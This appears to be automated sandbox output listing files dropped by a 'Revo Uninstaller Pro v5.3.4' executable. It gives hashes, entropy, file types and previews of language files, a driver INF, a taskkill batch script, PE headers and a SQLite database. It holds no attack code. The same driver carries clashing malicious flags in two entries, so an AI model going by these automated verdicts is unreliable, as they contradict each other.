                                                                                                                                            Size (bytes):128354
                                                                                                                                            Entropy (8bit):3.480986127025453
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:7aptCikJrEmw4kK/D9YyhsiJNWFjNSj6VDJzwgCo:7aV
                                                                                                                                            MD5:BCDE611DC4AAD7E214456CAFAB8FD146
                                                                                                                                            SHA1:7E2865DDC57F0CC9EC4BC396808E79F90048D3C2
                                                                                                                                            SHA-256:014A98FE1ED05D74C4BB37BC23295D318A827CA9ED140EB0D4824AB13B932327
                                                                                                                                            SHA-512:EA2F7202A8F51E10E30F18465C5732E56AEEA81E3F90FBA53D865D8DB5D0551473A9A76E21A81931A506CACE484960A180A45E3197CDBAE59987F516E2B5EB81
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.v.e.n.s.k.a./.S.w.e.d.i.s.h.....W.e.b.L.a.n.g.=.S.W.E.....T.r.a.n.s.l.a.t.o.r.=.1.F.F.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.i.s.n.i.n.g.....1.0.3. .=. .A.l.t.e.r.n.a.t.i.v.....1.0.4. .=. .A.v.i.n.s.t.a.l.l.e.r.a.r.e.....1.0.5. .=. .V.e.r.k.t.y.g.....1.0.6. .=. .J.a.k.t.l...g.e.....1.0.7. .=. .L.i.s.t.a.....1.0.8. .=. .I.k.o.n.e.r.....1.0.9. .=. .D.e.t.a.l.j.e.r.....1.1.0. .=. .A.v.i.n.s.t.a.l.l.e.r.a.....1.1.1. .=. .T.a. .b.o.r.t. .p.o.s.t.....1.1.2. .=. .U.p.p.d.a.t.e.r.a.....1.1.3. .=. ...r. .d.e.t. .s...k.e.r.t. .a.t.t. .d.u. .v.i.l.l. .t.a. .b.o.r.t. .d.e.n. .v.a.l.d.a. .p.o.s.t.e.n.?.....1.1.4. .=. ...r. .d.e.t. .s...k.e.r.t. .a.t.t. .d.u. .v.i.l.l. .a.v.i.n.s.t.a.l.l.e.r.a. .d.e.t. .v.a.l.d.a. .p.r.o.g.r.a.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (583), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106396
                                                                                                                                            Entropy (8bit):4.270018902460138
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:xR071uEADs98s2u4xu/7NoNQdyYEzFVI/2o9xrfln+R47G/LbWdE0wbmw1hCtumE:8398sgaUBFGP61wE
                                                                                                                                            MD5:BA844724649201A288754E2F55838ED2
                                                                                                                                            SHA1:F332C9A6022F567CF6A6F69200E1CD18FB125663
                                                                                                                                            SHA-256:2D78A79A7EEE659D0BCB0F1DA0E4D9EE8209C6A6DA0A6965E93C409902495E4D
                                                                                                                                            SHA-512:5917CEC00A8C81AE33AA6371E78422D95005D4796BB10E079F198E2F0B254272518A87D1C07E2DC7D4BF308F8D74C354176A6F03DC6CD4DC71D7B6F932267B24
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .2.).2.D..."./.T.h.a.i.....W.e.b.L.a.n.g. .=. .T.H.A.I.....T.r.a.n.s.l.a.t.o.r. .=. .P.o.r.n.c.h.a.i. .P.e.t.t.h.a.v.e.e.p.o.r.n.d.e.j.....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.4...4...2.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...9.....1.0.3. .=. ...1.'.@.%.7.-.......1.0.4. .=. .B...#.A...#.!...-.....2.#...4.....1.I.......1.0.5. .=. .@...#.7.H.-...!.7.-.....1.0.6. .=. .B.+.!.....1...@...-.#.L.....1.0.7. .=. .#.2."...2.#.....1.0.8. .=. .D.-...-.......1.0.9. .=. .#.2.".%.0.@.-.5.".......1.1.0. .=. ...-.....2.#...4.....1.I.......1.1.1. .=. .%...#.2."...2.#.....1.1.2. .=. .#.5.@...#.......1.1.3. .=. ...8...A...H.C...+.#.7.-.D.!.H.'.H.2...8.....I.-.....2.#.%...#.2."...2.#...5.H.@.%.7.-...?.....1.1.4. .=. ...8...A...H.C...+.#.7.-.D.!.H.'.H.2...I.-.....2.#...-.....2.#.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (304), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):59906
                                                                                                                                            Entropy (8bit):5.771309245234147
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:a1OmlKWIJw+wqYqn4wi7zv+vHj2gmoNus:o+wUY8W7zv+vHjlF
                                                                                                                                            MD5:FEE3AE3394835522278A93B0BC0D90DE
                                                                                                                                            SHA1:0E6E9CD7778E39B04CFC0360C8EEB3F96ADC7146
                                                                                                                                            SHA-256:8EC726AE49EA372C038E275B034C0CD4DD71F12E4DDC426701A89F889F9AE804
                                                                                                                                            SHA-512:F506246F3583B5D1E72F2FE5128D7CA17D8E2C5A75ABF522DCCA25622F84B672CE6C40EDFE945BDADF0C7B1B6C9BA1D9F8BB7985760E40AAB12BC23BC4BFAF3E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .A~.-N.e ./. .T.r.a.d.i.t.i.o.n.a.l. .C.h.i.n.e.s.e.....W.e.b.L.a.n.g.=. .T.C.H.....T.r.a.n.s.l.a.t.o.r.=. .T.o.m.m.y. .C.h.e.n.,. .t.o.n.y.y.u.2.7.,. .K.e.v.i.n.Y.u.0.5.0.4.....C.o.d.e.p.a.g.e.=. .U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=. .5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ..j......1.0.3. .=. .x.......1.0.4. .=. ..yd..{.t.T....1.0.5. .=. .vQ.[.]wQ....1.0.6. .=. .us.N!j._....1.0.7. .=. ..n.U....1.0.8. .=. ..W:y....1.0.9. .=. .s.0}..e....1.1.0. .=. ..yd..[.....1.1.1. .=. ..yd....v....1.1.2. .=. ...ete.t....1.1.3. .=. ..`/f&T.x.....yd.x..S.v...v?.....1.1.4. .=. ..`/f&T.x.....yd..[.x..S.v.z._?.....1.1.5. .=. ...R.f.e....1.1.6. .=. ....f....1.1.7. .=. ..vMR.]wQ...f..........1.1.8. .=. ..}.z..........1.1.9. .=. ...e..........1.2.0. .=. ..`&N^..|q}.{.t.T!.....1.2.1. .=. ..`
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (656), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):129774
                                                                                                                                            Entropy (8bit):3.6427799288392415
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:WZh0Mg04blwiRK6nWBgUwSnYE77SlqvRUy+2JykmAwT/WBGSBvO3PhC7CSfq3vb9:N+xDOMjRdno
                                                                                                                                            MD5:150B402E0D5419C483B36AF4EC6D870C
                                                                                                                                            SHA1:E1706E77AE988807AA60DE2BD028846B77543DB5
                                                                                                                                            SHA-256:36C3A2CC9AAD2C03C81FB049765E5352A3BFE7CC65F462ECB4A24F9961A1CA3E
                                                                                                                                            SHA-512:D4DF88863D41CE9A92725915BAAD6CD9B725F808CD00B300DFBA69A6A22A2C3984519AE9F05D376EF30053A8DD2D74A19567C295203E1F529D621C3702AF8BA9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.T...r.k...e./.T.u.r.k.i.s.h.....W.e.b.L.a.n.g.=.T.R.....T.r.a.n.s.l.a.t.o.r.=.K.a.y.a. .Z.e.r.e.n. .t.r.a.n.s.l.a.t.o.r.@.z.e.r.o.n...n.e.t.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...0...3.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n...m.....1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .K.a.l.d.1.r.1.c.1.....1.0.5. .=. .A.r.a...l.a.r.....1.0.6. .=. .A.v.c.1. .k.i.p.i.....1.0.7. .=. .L.i.s.t.e.....1.0.8. .=. .S.i.m.g.e.l.e.r.....1.0.9. .=. .A.y.r.1.n.t.1.l.a.r.....1.1.0. .=. .K.a.l.d.1.r.....1.1.1. .=. .K.a.y.1.d.1. .k.a.l.d.1.r.....1.1.2. .=. .Y.e.n.i.l.e.....1.1.3. .=. .S.e...i.l.m.i._. .k.a.y.d.1. .k.a.l.d.1.r.m.a.k. .i.s.t.e.d.i...i.n.i.z.e. .e.m.i.n. .m.i.s.i.n.i.z.?.....1.1.4. .=. .S.e...i.l.m.i._. .u.y.g.u.l.a.m.a.y.1. .k.a.l.d.1.r.m.a.k. .i.s.t.e.d.i...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (641), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):131462
                                                                                                                                            Entropy (8bit):4.006598591595778
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:bQUlrmrvEWUtL3EgNSp/7IAu821YhLxg2YS/:bQUlr0vG3TSp/7IAu82uhLd
                                                                                                                                            MD5:2B18F02BB760F19F344D567B0C671EA8
                                                                                                                                            SHA1:79BEC0F51098B51A90F63DA05CEBC8FBE560B556
                                                                                                                                            SHA-256:71C9B4A2712ACD913EEE9FDF4178E344CD6AF79915CA01AC9FFBD6A797B096EA
                                                                                                                                            SHA-512:55BEEDE938831AE93DBBE34C946AFE3C13EB0F670974DECA3275C2D431581C8D689703807E88CA28E483234CFD6C025B912EACCD8F645E3C9B409CC7CFA9950E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .#.:.@.0.W.=.A.L.:.0./.U.k.r.a.i.n.i.a.n.....W.e.b.L.a.n.g.=.U.K.R.....T.r.a.n.s.l.a.t.o.r.=.A.l.e.x.e.y. .L.u.g.i.n. .-. .a.l.e.x.e.y.l.u.g.i.n.@.g.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...8.3.;.O.4.....1.0.3. .=. ...0.;.0.H.B.C.2.0.=.=.O. .....1.0.4. .=. ...5.V.=.A.B.0.;.O.B.>.@. .....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.8. .....1.0.6. .=. . .5.6.8.<. .?.>.;.N.2.0.=.=.O. .....1.0.7. .=. .!.?.8.A.>.:. .....1.0.8. .=. ...V.:.B.>.3.@.0.<.8. .....1.0.9. .=. ...5.B.0.;.V. .....1.1.0. .=. ...5.V.=.A.B.0.;.O.F.V.O. .....1.1.1. .=. ...8.4.0.;.8.B.8. .5.;.5.<.5.=.B. .....1.1.2. .=. ...=.>.2.8.B.8. .....1.1.3. .=. ...8.4.0.;.8.B.8. .2.8.1.@.0.=.8.9. .5.;.5.<.5.=.B.?. .....1.1.4. .=. ...5.V.=.A.B.0.;.N.2.0.B.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (551), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):121866
                                                                                                                                            Entropy (8bit):4.039495906761851
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo4utFqYH2EX12i3SK0ZGjiuh1AjBVXstShQY6vbCXWpvXZnZtjAkussDj/5k0l1:Wii3SxojNuXs2KB82gEWNqu
                                                                                                                                            MD5:3496F90CD98263718552E231F2605E67
                                                                                                                                            SHA1:5BA4DCC61A461C6F3575377B38AEEA3913BB3BD9
                                                                                                                                            SHA-256:17DA614E8B8ACE89547B561BDE7B15EFEEEDA09B12A6D79DD1679B7A66D8D207
                                                                                                                                            SHA-512:214C2146FA1C577A4414E1BA8E45C75115CCDF06F7377A830E82C32B4D0F4933F4A237433536DCB78E1E93145C85BAFDB3D217A7EB7420960532C081B58F29CD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.T.i...n.g. .V.i...t./.V.i.e.t.n.a.m.e.s.e. .....W.e.b.L.a.n.g.=.V.N.....T.r.a.n.s.l.a.t.o.r.=. .....n.g. .T.r...n. .L... .A.n.h.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .H.i...n. .t.h.......1.0.3. .=. .T...y. .c.h...n.....1.0.4. .=. .G... .b.......1.0.5. .=. .C...n.g. .c.......1.0.6. .=. .C.h... ..... .t.r.u.y. .t...m.....1.0.7. .=. .D.a.n.h. .s...c.h.....1.0.8. .=. .B.i...u. .t.....n.g.....1.0.9. .=. .C.h.i. .t.i...t.....1.1.0. .=. .G... .b.......1.1.1. .=. .X.o...a. .t.r.o.n.g. .r.e.g.i.s.t.r.y.....1.1.2. .=. .L...m. .m...i.....1.1.3. .=. .B...n. .c... .m.u...n. .g... .r.e.g.i.s.t.r.y. .....i. .t.....n.g. ..... .c.h...n.?.....1.1.4. .=. .B...n. .c... .m.u...n. .g... .p.h...n. .m...m. ..... .c.h...n.?.....1.1.5. .
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88
                                                                                                                                            Entropy (8bit):4.6625095008025434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:nVN2kLnCvvEOVtqvepJQjkX3TAX:nvxrCvvEOPqvewwX8X
                                                                                                                                            MD5:85F8F277D3AB3F45C089C0B81116D85E
                                                                                                                                            SHA1:9D3106AE997DB2F449894446B296C5A14EC20E91
                                                                                                                                            SHA-256:6E6B62366A433BF575E72582FA7690C7B7901945B9C138F177FE657F00D77B3C
                                                                                                                                            SHA-512:C5A05526A1DF5A6E1B9F5E1DA9E602C78F87C4B189ECFB61BF8407BDD6B5316EE866435F1D70086A2601DFD40C90FA5B1DB12D1C1E51DE9BA2F7174306AC1276
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:taskkill /IM RevoUninPro.exe /F..taskkill /IM ruplp.exe /F.."%~dp0\ruplp.exe" /regserver
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2444
                                                                                                                                            Entropy (8bit):4.986959697467434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                            MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                            SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                            SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                            SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DesusertionDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2444
                                                                                                                                            Entropy (8bit):4.986959697467434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                            MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                            SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                            SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                            SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DesusertionDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3007016, page size 1024, file counter 53475, database pages 19288, 1st free page 14928, free pages 4, cookie 0x5f, schema 1, UTF-8, version-valid-for 53475
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19750912
                                                                                                                                            Entropy (8bit):5.916143535151713
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:GEKRfz9PgHG9uUkqS/cmsLPGkLgHfC8wlPWz88RlfpwrjsWWv89uwbSzAMZo6h8e:GRfB2upPBxAUg/Jb9R
                                                                                                                                            MD5:E821132DBECE4D288D3B1B3B68373B3A
                                                                                                                                            SHA1:DAC86F72E5C2AAEB5EFDFEA06BF9C5DEF980C74E
                                                                                                                                            SHA-256:E786FA86DB21A4FFE8F78EBF032715390C05D1EDBDB6C90FEF75E0ED3D946CD3
                                                                                                                                            SHA-512:4701788F4A91F76F3A63843935DF5A8F80535D85FF0F760AF86C21601D73B40F8C4D00A883DC64E50482C201BB7D4F3867A038223593227AC79AA14520F2068E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ......KX..:P......._.....................................................-.(.................R.......................................!........tableILogsILogs..CREATE TABLE [ILogs] ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Publisher] TEXT, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NULL, [WVer64Bits] INTEGER NOT NULL, [RKey] TEXT, [RDN] TEXT, [RUS] TEXT, [RPVer] TEXT)*...=...indexsqlite_autoindex_ILogs_2ILogs..*...=...indexsqlite_autoindex_ILogs_1ILogs.......Q.5G!..indexsqlite_autoindex_ILogs_bak0_2ILogs_bak0....UG!..indexsqlite_autoindex_ILogs_bak0_1ILogs_bak0.... .!!...tableILogs_bak0ILogs_bak0.CREATE TABLE "ILogs_bak0" ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NUL...T))._tablecreation_tablecreation_tableC.CREATE TABLE creation_table (tmp INTEGER)X........tableInfoInfo.CREATE TABLE Info (NProgs TEXT, Ver TEXT, D
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10103264
                                                                                                                                            Entropy (8bit):6.199563892292486
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:196608:TqWbk1lXrMI8h9rGe2DvwfaycAE9kspvCJ6UkXzp91IIH91IL91I0:Tq2OiI8h8rBx91IW91IL91I0
                                                                                                                                            MD5:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                            SHA1:CF0776ECBC163C738FD43767BEDCC2A67ACEF423
                                                                                                                                            SHA-256:C6D97857B3B9F26C8E93D7B6E6481F93A16DB75CBF9D1756CB29FBA0FD9E240E
                                                                                                                                            SHA-512:060FB76D91BEE1B421F133CAE17726A68ADC97DDCE76A67196D10E735E216D032BEE939C905B847C50F29E859DCA43CDF1B19E4AE349E00EFE88147224D665CB
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....?Y..................^..L;.......^.......^...@.......................... ..................@...................@i.b.....h..k...0q...1..............5...pi..............................`i.......................h......0i......................text....n^......p^................. ..`.itext..x2....^..4...t^............. ..`.data....-....^.......^.............@....bss.........._..........................idata...k....h..l...._.............@....didata......0i......B`.............@....edata..b....@i......N`.............@..@.tls.........Pi..........................rdata.......`i......P`.............@..@.reloc.......pi......R`.............@..B.rsrc.....1..0q...1...h.............@..@............. ......................@..@................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65794
                                                                                                                                            Entropy (8bit):7.997450817749907
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:1536:wg8dvQaFp4zqjLCzkCYlnXMEbnxbiHgsWtXTiKE6AXutI0b:6dvPFHLCzYlnXBUg3TibT+5
                                                                                                                                            MD5:8462A9B69C76A9603A4143D51FBC201E
                                                                                                                                            SHA1:4473590F93F94F22C340A354516191C3C0BA6532
                                                                                                                                            SHA-256:FE4BCB4251F77375119A936C80FB36221AF0C5105E840E2E115D47F96CB437C8
                                                                                                                                            SHA-512:2F02ECDB06760A093F4D8E6F04C97138695B064DB8CB2DCC4AF9B47C829852F38B77BE9425EB2F3E3E36F85DA181C116C829921FA35AE68AFC57C728D5393570
                                                                                                                                            Malicious:false
